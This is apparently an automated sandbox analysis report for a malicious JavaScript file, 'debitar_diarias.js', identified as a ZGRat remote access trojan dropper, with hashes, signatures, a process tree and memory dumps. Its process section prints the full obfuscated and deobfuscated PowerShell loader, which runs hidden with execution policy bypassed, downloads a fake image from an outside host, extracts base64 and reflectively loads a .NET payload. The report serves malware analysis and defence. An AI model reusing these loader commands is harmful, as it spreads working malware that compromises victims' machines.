Analysis

  • max time kernel
    118s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    12-10-2023 07:43

General

  • Target

    debitar_diarias.js

  • Size

    464KB

  • MD5

    552b4a922bbef46373dd3042c7b6a6c7

  • SHA1

    9cf93f1b3b5c39f46ed62183fc73ff0f80700c23

  • SHA256

    8e792471355b42e56a05e58ef2cb62f2572bda8db9740ae8526c99e3db41078b

  • SHA512

    4cd0c9bda90fdf00d6b373e0a1015169413de69f3a9d25c00d2bef71b0f36e053335be08958729355042c5e598477e9a812ed511edfdd937fffa1aa59c22192f

  • SSDEEP

    768:7W77777977777977777977777s7777797777797777797777797777797777797N:7lSRHnlL1Gsu

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/611/936/original/new_image_rump_js.jpg?1695057372

exe.dropper

https://uploaddeimagens.com.br/images/004/611/936/original/new_image_rump_js.jpg?1695057372

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\debitar_diarias.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░2░░░DE░░░MQ░░░v░░░Dk░░░Mw░░░2░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░bgBl░░░Hc░░░XwBp░░░G0░░░YQBn░░░GU░░░XwBy░░░HU░░░bQBw░░░F8░░░agBz░░░C4░░░agBw░░░Gc░░░Pw░░░x░░░DY░░░OQ░░░1░░░D░░░░░░NQ░░░3░░░DM░░░Nw░░░y░░░Cc░░░Ow░░░k░░░Hc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░C░░░░░░PQ░░░g░░░E4░░░ZQB3░░░C0░░░TwBi░░░Go░░░ZQBj░░░HQ░░░I░░░BT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░E4░░░ZQB0░░░C4░░░VwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBC░░░Hk░░░d░░░Bl░░░HM░░░I░░░░░░9░░░C░░░░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░u░░░EQ░░░bwB3░░░G4░░░b░░░Bv░░░GE░░░Z░░░BE░░░GE░░░d░░░Bh░░░Cg░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░KQ░░░7░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░I░░░░░░9░░░C░░░░░░WwBT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░FQ░░░ZQB4░░░HQ░░░LgBF░░░G4░░░YwBv░░░GQ░░░aQBu░░░Gc░░░XQ░░░6░░░Do░░░VQBU░░░EY░░░O░░░░░░u░░░Ec░░░ZQB0░░░FM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BG░░░Gw░░░YQBn░░░C░░░░░░PQ░░░g░░░Cc░░░P░░░░░░8░░░EI░░░QQBT░░░EU░░░Ng░░░0░░░F8░░░UwBU░░░EE░░░UgBU░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BG░░░Gw░░░YQBn░░░C░░░░░░PQ░░░g░░░Cc░░░P░░░░░░8░░░EI░░░QQBT░░░EU░░░Ng░░░0░░░F8░░░RQBO░░░EQ░░░Pg░░░+░░░Cc░░░Ow░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BG░░░Gw░░░YQBn░░░Ck░░░Ow░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░D0░░░I░░░░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C4░░░SQBu░░░GQ░░░ZQB4░░░E8░░░Zg░░░o░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░LQBn░░░GU░░░I░░░░░░w░░░C░░░░░░LQBh░░░G4░░░Z░░░░░░g░░░CQ░░░ZQBu░░░GQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░LQBn░░░HQ░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░r░░░D0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BG░░░Gw░░░YQBn░░░C4░░░T░░░Bl░░░G4░░░ZwB0░░░Gg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░C░░░░░░PQ░░░g░░░CQ░░░ZQBu░░░GQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░LQ░░░g░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░7░░░CQ░░░YgBh░░░HM░░░ZQ░░░2░░░DQ░░░QwBv░░░G0░░░bQBh░░░G4░░░Z░░░░░░g░░░D0░░░I░░░░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C4░░░UwB1░░░GI░░░cwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░L░░░░░░g░░░CQ░░░YgBh░░░HM░░░ZQ░░░2░░░DQ░░░T░░░Bl░░░G4░░░ZwB0░░░Gg░░░KQ░░░7░░░CQ░░░YwBv░░░G0░░░bQBh░░░G4░░░Z░░░BC░░░Hk░░░d░░░Bl░░░HM░░░I░░░░░░9░░░C░░░░░░WwBT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░EM░░░bwBu░░░HY░░░ZQBy░░░HQ░░░XQ░░░6░░░Do░░░RgBy░░░G8░░░bQBC░░░GE░░░cwBl░░░DY░░░N░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░YgBh░░░HM░░░ZQ░░░2░░░DQ░░░QwBv░░░G0░░░bQBh░░░G4░░░Z░░░░░░p░░░Ds░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░I░░░░░░9░░░C░░░░░░WwBT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░FI░░░ZQBm░░░Gw░░░ZQBj░░░HQ░░░aQBv░░░G4░░░LgBB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░XQ░░░6░░░Do░░░T░░░Bv░░░GE░░░Z░░░░░░o░░░CQ░░░YwBv░░░G0░░░bQBh░░░G4░░░Z░░░BC░░░Hk░░░d░░░Bl░░░HM░░░KQ░░░7░░░CQ░░░d░░░B5░░░H░░░░░░ZQ░░░g░░░D0░░░I░░░░░░k░░░Gw░░░bwBh░░░GQ░░░ZQBk░░░EE░░░cwBz░░░GU░░░bQBi░░░Gw░░░eQ░░░u░░░Ec░░░ZQB0░░░FQ░░░eQBw░░░GU░░░K░░░░░░n░░░EY░░░aQBi░░░GU░░░cg░░░u░░░Eg░░░bwBt░░░GU░░░Jw░░░p░░░Ds░░░J░░░Bt░░░GU░░░d░░░Bo░░░G8░░░Z░░░░░░g░░░D0░░░I░░░░░░k░░░HQ░░░eQBw░░░GU░░░LgBH░░░GU░░░d░░░BN░░░GU░░░d░░░Bo░░░G8░░░Z░░░░░░o░░░Cc░░░VgBB░░░Ek░░░Jw░░░p░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░Fs░░░bwBi░░░Go░░░ZQBj░░░HQ░░░WwBd░░░F0░░░I░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB0░░░HQ░░░LwB0░░░HQ░░░Lw░░░y░░░C4░░░Mw░░░1░░░DE░░░Lg░░░y░░░Dg░░░Lg░░░w░░░DQ░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░C░░░░░░L░░░░░░g░░░Cc░░░bQBl░░░HI░░░Z░░░Bh░░░GE░░░YQBh░░░GE░░░YQ░░░n░░░Ck░░░KQ░░░=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('░░░','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/611/936/original/new_image_rump_js.jpg?1695057372';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.tt/tt/2.351.28.04//:ptth' , 'merdaaaaaa'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2908

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    304B

    MD5

    35d95bbc41212895f108fb250151413d

    SHA1

    072bdd50378c11a00548489a209860aa65c8a933

    SHA256

    c1da2c0655cd1cdcedd38b3f7228d308a96d3596bc94a17b1261865d30316c68

    SHA512

    809c16a536ae9ed6171030e15ba557e5867eddeec648319c6e4acd1866324117314a853e09745419e436be4825fb1557b662b8795bc84ee1e55a3b1d104fdd1f

  • C:\Users\Admin\AppData\Local\Temp\Cab8900.tmp

    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

  • C:\Users\Admin\AppData\Local\Temp\Tar89BE.tmp

    Filesize

    163KB

    MD5

    9441737383d21192400eca82fda910ec

    SHA1

    725e0d606a4fc9ba44aa8ffde65bed15e65367e4

    SHA256

    bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

    SHA512

    7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5450CGNI4XNUR4ZKO34S.temp

    Filesize

    7KB

    MD5

    7bc494b5f1908e733a5d57c17a8b9cc4

    SHA1

    6912dbbc2fce4465f492d0f7698277f2e44115a1

    SHA256

    df4ce479db2edcd0446532407f97c24c59ce4986ad6c0d2ac7aebeaafa9f5093

    SHA512

    474c0bdc7dcc3341da43b1051575b4ecd657fcb8bc6a05f1a6240a078a71deb4c7d4dc4d717c3eb5f92da3cad61ecb80442ebb17e47a7b3be190df62980df246

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    7bc494b5f1908e733a5d57c17a8b9cc4

    SHA1

    6912dbbc2fce4465f492d0f7698277f2e44115a1

    SHA256

    df4ce479db2edcd0446532407f97c24c59ce4986ad6c0d2ac7aebeaafa9f5093

    SHA512

    474c0bdc7dcc3341da43b1051575b4ecd657fcb8bc6a05f1a6240a078a71deb4c7d4dc4d717c3eb5f92da3cad61ecb80442ebb17e47a7b3be190df62980df246

  • memory/2432-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2432-96-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-11-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-8-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-9-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-101-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2432-100-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-98-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-4-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

    Filesize

    2.9MB

  • memory/2432-95-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-5-0x0000000002490000-0x0000000002498000-memory.dmp

    Filesize

    32KB

  • memory/2432-23-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2432-7-0x00000000026D0000-0x0000000002750000-memory.dmp

    Filesize

    512KB

  • memory/2432-6-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-22-0x0000000002A10000-0x0000000002A90000-memory.dmp

    Filesize

    512KB

  • memory/2908-21-0x0000000002A10000-0x0000000002A90000-memory.dmp

    Filesize

    512KB

  • memory/2908-20-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-19-0x0000000002A10000-0x0000000002A90000-memory.dmp

    Filesize

    512KB

  • memory/2908-97-0x000000001D170000-0x000000001D490000-memory.dmp

    Filesize

    3.1MB

  • memory/2908-99-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-18-0x0000000002A10000-0x0000000002A90000-memory.dmp

    Filesize

    512KB

  • memory/2908-17-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB